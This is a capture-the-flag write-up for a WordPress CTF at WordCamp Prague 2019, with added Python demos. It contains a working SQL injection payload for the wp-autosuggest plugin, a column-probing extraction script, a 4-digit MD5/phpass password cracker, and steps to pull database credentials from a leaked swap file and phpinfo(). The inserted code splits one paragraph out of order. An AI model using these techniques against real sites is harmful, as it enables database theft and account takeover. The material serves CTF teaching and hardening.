<h1>Capture the Flag &#8211; solutions to flags 7 and 8</h1>
<p>WordCamp Prague 2019. Published 2019-02-19, last updated 2019-03-02. Original Czech post: <a href="https://prague.wordcamp.org/2019/capture-the-flag-reseni-flagu-7-8/">https://prague.wordcamp.org/2019/capture-the-flag-reseni-flagu-7-8/</a></p>
<p>Not many flags are left, so let's look at the next two.</p>
<p>Video walkthrough: <a href="https://www.youtube.com/embed/GfEJpDtHk_I">https://www.youtube.com/embed/GfEJpDtHk_I</a></p>
<h3><strong>Flag 7</strong>: &#8220;Yesterday, today and tomorrow&#8221;</h3>
<p>These flags were all about the database. From <strong>robots.txt</strong> we learned of the existence of a file called backup.sql. That, however, was a nasty trap: attempting to download it earned you a ban.
The path was not a complete dead end, though: we received a hint that files like this are best compressed, and <strong>backup.sql.gz</strong> was within reach.</p>
<p>Browsing the database dump we could see references to some flags already captured, but in the ctf_options table we also found a peculiar option, <strong>flag7_option</strong>, holding the first half of this key.</p>
<p>Sometimes the old value is not what we care about; we want the present. The goal was therefore to find out what value flag7_option holds <em>now</em>, and that required <strong>access to the live database</strong>. There was more than one way in.</p>
<p>The first was revealed by wp-scan, which pointed out a plugin (wp-autosuggest) with a known <a href="https://www.exploit-db.com/exploits/45977">SQL injection vulnerability</a>. After studying the vulnerable code and a few attempts against the live site, all that remained was to craft a query that read the value out of the database.</p>
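<p>How the UNION-based extraction works end to end, as an added Python example that is not code from the write-up or from the wp-autosuggest plugin. The vulnerable function is a hypothetical reconstruction of the bug class (user input concatenated into a LIKE clause after only the space-to-% replacement the write-up mentions), the table contents are constructed, and the demo runs on sqlite offline, so the trailing comment is <code>--</code> instead of MySQL's <code>#</code>. It goes one step beyond the page's single hand-built query by probing the number of result columns first (the page's query needed 23), which is how one arrives at that column list on an unfamiliar target.</p>

```python
import sqlite3

# Constructed stand-in for the tables the write-up mentions (ctf_ prefix as on
# the page). Row contents are made up; the real dump is not reproduced here.
def build_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE ctf_posts (ID INTEGER, post_title TEXT, post_status TEXT)")
    con.executemany("INSERT INTO ctf_posts VALUES (?, ?, ?)",
                    [(1, "Hello world!", "publish"), (2, "Flag 3 hints", "publish")])
    con.execute("CREATE TABLE ctf_options (option_id INTEGER, option_name TEXT, option_value TEXT)")
    con.executemany("INSERT INTO ctf_options VALUES (?, ?, ?)",
                    [(1, "siteurl", "https://ctf.example"),
                     (2, "flag7_option", "DEMO-SECOND-HALF")])
    return con


def vulnerable_autosuggest(con, keys):
    # Hypothetical reconstruction of the bug class, not the plugin's real code:
    # the only "sanitising" is spaces -> '%', then the value goes straight into SQL.
    keys = keys.replace(" ", "%")
    sql = ("SELECT ID, post_title, post_status FROM ctf_posts "
           f"WHERE post_title LIKE ('%{keys}%')")
    return con.execute(sql).fetchall()


def safe_autosuggest(con, keys):
    # Hardened form: the same space handling, but the value is bound as a
    # parameter, so it can only ever be pattern text, never SQL.
    keys = keys.replace(" ", "%")
    return con.execute("SELECT ID, post_title, post_status FROM ctf_posts "
                       "WHERE post_title LIKE ('%' || ? || '%')", (keys,)).fetchall()


def find_column_count(con, max_cols=40):
    # A UNION only parses when both SELECTs have the same width, so widen a
    # NULL probe until the database stops complaining. No spaces anywhere:
    # '/**/' (accepted by MySQL and sqlite) survives the space -> '%' rewrite.
    for n in range(1, max_cols + 1):
        probe = "0')UNION/**/SELECT/**/" + ",".join(["NULL"] * n) + "--"
        try:
            vulnerable_autosuggest(con, probe)
            return n
        except sqlite3.OperationalError:
            continue
    return None


def build_payload(option_name, ncols):
    # First injected column carries the value; the rest are numeric filler,
    # exactly the shape of the page's option_value,1,2,...,22 payload.
    # The leading "0'" picks a search term unlikely to match real titles, so
    # the injected row is the only one returned.
    cols = ["option_value"] + [str(i) for i in range(1, ncols)]
    return ("0')UNION/**/SELECT/**/" + ",".join(cols)
            + "/**/FROM/**/ctf_options/**/WHERE/**/option_name='"
            + option_name + "'--")


def extract_option(con, option_name):
    ncols = find_column_count(con)
    if ncols is None:
        return None
    rows = vulnerable_autosuggest(con, build_payload(option_name, ncols))
    return rows[0][0] if rows else None


if __name__ == "__main__":
    db = build_db()
    print("columns:", find_column_count(db))
    print("flag7_option:", extract_option(db, "flag7_option"))
    print("same payload against the parameterised query:",
          safe_autosuggest(db, build_payload("flag7_option", 3)))
```

<p>Against the parameterised version the identical payload returns no rows: the database sees one long LIKE pattern, not a second SELECT.</p>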
<p>A minor snag was that the plugin replaces spaces with the <code>%</code> character; that was easily bypassed by replacing the spaces in our payload with empty comments (<code>/**/</code>), which MySQL treats as whitespace.</p>
<p><a href="https://ctf.wordcamppraha.cz/wp-content/plugins/wp-autosuggest/autosuggest.php?wpas_action=query&amp;wpas_keys=0%27)UNION\/**\/SELECT\/**\/option_value,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22\/**\/FROM\/**\/ctf_options\/**\/WHERE\/**\/option_name=%27flag7_option%27%23">The resulting query</a>, with the URL encoding removed, sends this as <code>wpas_keys</code>:</p>
<p><code>0')UNION/**/SELECT/**/option_value,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/ctf_options/**/WHERE/**/option_name='flag7_option'#</code></p>
<p>The <code>0')</code> closes the plugin's own LIKE clause, the 22 numeric fillers pad the UNION to the same width as the original SELECT, and the trailing <code>#</code> comments out whatever the plugin appends.</p>
<p>Of course, the automated tool sqlmap could also have been used to pull information from the database, but the UNION SELECT route is a little more elegant.</p>
<p>Thanks to this vulnerability we completed the seventh set of flags.</p>
<h3><strong>Flag 8</strong>: &#8220;Password, password, little password&#8221;</h3>
<p>While examining the database one could stumble upon another of the flags. We discovered <strong>three more WordPress users</strong>: flag8a, flag8b and flag8c. Each used a different password hash: the old, simple <strong>MD5</strong>; the then-current <strong>phpass</strong> (WordPress's portable <code>$P$</code> hashes); and the modern <strong>bcrypt</strong>. So we have three hashes, and from the rules of our CTF we know each password consists of 4 digits.
All that remained was to crack them, which was not hard at all.</p>
<p><img src="https://i0.wp.com/2019.prague.wordcamp.org/files/2019/02/ctf-hesla.png" alt="ctf-hesla.png (screenshot)" width="660" height="58" /></p>
<p>In the demo we used John the Ripper with a mask for 4 digits: <code>john --mask=?d?d?d?d --format=raw-md5 soubor-s-hashi.txt</code> (where <code>soubor-s-hashi.txt</code> is the file of hashes). Note that <code>--format=raw-md5</code> only covers the MD5 hash; the other two need separate runs with <code>--format=phpass</code> and <code>--format=bcrypt</code>.</p>
<p>MD5 fell in a fraction of a second. phpass did not take much longer, though a slight slowdown was noticeable. For bcrypt we had to wait several minutes: its work factor is exactly what makes 10,000 candidates expensive.</p>
<p>With a GPU we would of course have had the results much sooner.</p>
<p>Cracking all three hashes gave us another key.</p>
<p>An alternative route to the database was the fact that a forgotten copy of <a href="https://www.adminer.org/">Adminer</a> was sitting on the site (a great tool, but like phpMyAdmin it is not wise to leave it reachable).
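<p>The mask attack from the John command above, as an added Python example that is not from the write-up: a mask expander plus a pure-Python check for raw MD5 and for WordPress's portable phpass scheme (<code>$P$</code> prefix, reimplemented here from the published phpass algorithm and tested only for self-consistency). The hash values, salts and the <code>crack_timed</code> helper are constructed for the demo; bcrypt is left to John because it needs a package outside the standard library. Running it shows the same ordering as the page: MD5 is instant, phpass noticeably slower because every candidate costs 8193 MD5 rounds at WordPress's default <code>$P$B</code> cost.</p>

```python
import hashlib
import itertools
import time

# phpass alphabet: index of the 4th hash character gives log2 of the round count
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"


def _encode64(data, count):
    """phpass's custom base64 (3 bytes -> 4 chars, no padding)."""
    out = []
    i = 0
    while True:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < count:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= count:
            break
        i += 1
        if i < count:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= count:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
        if i >= count:
            break
    return "".join(out)


def phpass_hash(password, setting):
    """Portable phpass: md5(salt+pw), then 2**log2 rounds of md5(h+pw).
    `setting` is the first 12 chars of a stored hash, e.g. '$P$B' + 8-char salt."""
    count = 1 << ITOA64.index(setting[3])
    salt = setting[4:12].encode()
    h = hashlib.md5(salt + password).digest()
    for _ in range(count):
        h = hashlib.md5(h + password).digest()
    return setting[:12] + _encode64(h, 16)


def mask_candidates(mask="?d?d?d?d"):
    """Expand a John/hashcat-style mask; only ?d ?l ?u and literal chars here."""
    sets = {"d": "0123456789",
            "l": "abcdefghijklmnopqrstuvwxyz",
            "u": "ABCDEFGHIJKLMNOPQRSTUVWXYZ"}
    charsets = []
    i = 0
    while i < len(mask):
        if mask[i] == "?" and i + 1 < len(mask):
            charsets.append(sets[mask[i + 1]])
            i += 2
        else:
            charsets.append(mask[i])
            i += 1
    for combo in itertools.product(*charsets):
        yield "".join(combo)


def crack(stored, mask="?d?d?d?d"):
    """Return the mask candidate reproducing `stored` (hex MD5 or $P$/$H$ phpass), else None."""
    if stored.startswith(("$P$", "$H$")):
        def check(pw):
            return phpass_hash(pw.encode(), stored) == stored
    else:
        def check(pw):
            return hashlib.md5(pw.encode()).hexdigest() == stored.lower()
    for cand in mask_candidates(mask):
        if check(cand):
            return cand
    return None


def crack_timed(stored, mask="?d?d?d?d"):
    start = time.perf_counter()
    return crack(stored, mask), time.perf_counter() - start


if __name__ == "__main__":
    # Constructed sample hashes for two of the three users (values are not from the CTF).
    samples = {
        "flag8a": "81dc9bdb52d04dc20036dbd8313ed055",          # md5("1234")
        "flag8b": phpass_hash(b"0071", "$P$Bsalt0123"),         # WordPress-style $P$B
    }
    for user, h in samples.items():
        pw, secs = crack_timed(h)
        print(f"{user}: {pw} ({secs:.2f}s)")
```

<p>The mask keeps the search space at 10,000 candidates regardless of the hash, so the only thing that changes between the three users is the per-guess cost; that is the whole argument for bcrypt (or phpass with a high cost) over MD5 for stored passwords.</p>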
From wp-scan we further learned that the site exposed the swap file <strong>.wp-config.php.swp</strong>, left behind when the configuration file was edited in production with vim (a swap file holds the buffer text in the clear, so <code>strings</code> is enough to read it). After downloading it we had the database credentials. Almost&#8230;</p>
<p>Unfortunately the password itself was not in the file, because it was read from the environment variable &#8220;dbpass&#8221;. Environment variables, however, can be read from the phpinfo() output we had discovered earlier in <strong>phpinfo.php</strong>. With that knowledge it was no problem to get into the database far more conveniently, through the Adminer instance mentioned above.</p>
<p>For next time only the final flag 9 remains, one that many competitors broke their teeth on.</p>
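<p>The credential chain just described (a <code>getenv()</code> call in wp-config.php, the value sitting in phpinfo()'s Environment table), as an added Python example that is not part of the original post. Both inputs are constructed samples: the config text stands for what <code>strings</code> pulls out of the swap file, and the HTML fragment mimics phpinfo's usual <code>td class="e"</code> / <code>td class="v"</code> row layout. Anything the environment dump does not cover is reported as unresolved rather than guessed.</p>

```python
import re

# Constructed sample of the wp-config.php text recovered from the swap file:
# the password is not a literal but a getenv() lookup. Not the real file.
WP_CONFIG_TEXT = """\
define( 'DB_NAME', 'ctf_db' );
define( 'DB_USER', 'ctf_user' );
define( 'DB_PASSWORD', getenv('dbpass') );
define( 'DB_HOST', 'localhost' );
$table_prefix = 'ctf_';
"""

# Constructed fragment of a phpinfo() page; the Environment section is a
# name/value table. The values are invented for the demo.
PHPINFO_HTML = """\
<h2>Environment</h2>
<table>
<tr class="h"><th>Variable</th><th>Value</th></tr>
<tr><td class="e">PATH </td><td class="v">/usr/local/bin:/usr/bin </td></tr>
<tr><td class="e">dbpass </td><td class="v">demo-not-a-real-secret </td></tr>
</table>
"""

DEFINE_RE = re.compile(r"""define\(\s*['"](\w+)['"]\s*,\s*(.+?)\s*\)\s*;""")
GETENV_RE = re.compile(r"""getenv\(\s*['"]([^'"]+)['"]\s*\)""")
PHPINFO_ROW_RE = re.compile(
    r'<td class="e">\s*(.*?)\s*</td>\s*<td class="v">\s*(.*?)\s*</td>', re.S)


def parse_defines(text):
    """Map define() names to their raw (unevaluated) PHP expressions."""
    return {name: raw for name, raw in DEFINE_RE.findall(text)}


def parse_phpinfo_env(html):
    """Environment rows of a phpinfo() dump as a dict."""
    return {name: value for name, value in PHPINFO_ROW_RE.findall(html)}


def resolve_db_credentials(config_text, phpinfo_html):
    """Resolve DB_* defines; getenv() references are looked up in the phpinfo
    environment. Returns (credentials, names that could not be resolved)."""
    env = parse_phpinfo_env(phpinfo_html)
    creds, unresolved = {}, []
    for name, raw in parse_defines(config_text).items():
        if not name.startswith("DB_"):
            continue
        m = GETENV_RE.fullmatch(raw)
        if m is None:
            creds[name] = raw.strip("'\"")      # plain string literal
        elif m.group(1) in env:
            creds[name] = env[m.group(1)]      # indirection resolved via phpinfo
        else:
            unresolved.append(m.group(1))      # would need another leak to fill
    return creds, unresolved


if __name__ == "__main__":
    creds, missing = resolve_db_credentials(WP_CONFIG_TEXT, PHPINFO_HTML)
    for k, v in creds.items():
        print(f"{k} = {v}")
    if missing:
        print("unresolved env vars:", missing)
```

<p>The hardening lesson is the inverse of the script: keeping the secret out of wp-config.php only helps if nothing else on the host prints the environment, and a stray phpinfo.php (or an exposed editor swap file) undoes it.</p>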